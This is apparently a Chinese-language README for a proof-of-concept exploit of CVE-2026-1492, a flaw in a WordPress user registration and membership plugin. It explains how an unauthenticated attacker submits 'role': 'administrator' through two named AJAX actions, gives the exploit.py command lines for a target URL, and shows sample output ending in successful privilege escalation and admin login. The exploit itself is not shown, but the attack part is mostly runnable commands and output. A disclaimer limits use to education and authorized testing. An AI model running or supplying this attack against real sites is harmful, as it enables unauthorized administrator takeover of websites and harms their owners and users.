本仓库包含针对 CVE-2026-1492 的概念验证漏洞利用代码,该漏洞影响 WordPress 用户注册与会员 插件。
该漏洞允许 未认证的攻击者 通过滥用会员注册流程创建管理员账户。
👉 该漏洞的完整技术分析可在此处查看:
技术分析
其中逐步解释了后端如何处理攻击者控制的数据,以及为何能够实现权限提升。
该插件在会员注册过程中错误地信任了用户控制的输入。
具体来说:
role这使得攻击者可以设置:
"role": "administrator"
并获得完全的管理员访问权限。
成功利用该漏洞可导致:
该漏洞通过多步骤 AJAX 流程触发:
user_registration_user_form_submit 注册用户user_registration_membership_register_member 触发会员注册administrator)python3 exploit.py -t http://target -ru 'http://target/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] 正在提取令牌...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] 正在发送注册请求...
[+] 用户已创建
[*] 正在发送会员请求...
[+] 权限提升成功
使用生成的凭据登录:
http://target/wp-login.php
然后访问管理面板:
http://target/wp-admin/
注意:管理路径可能已被自定义。
本漏洞利用代码仅用于 教育目的和授权的安全测试。
未经许可,请勿对任何系统使用。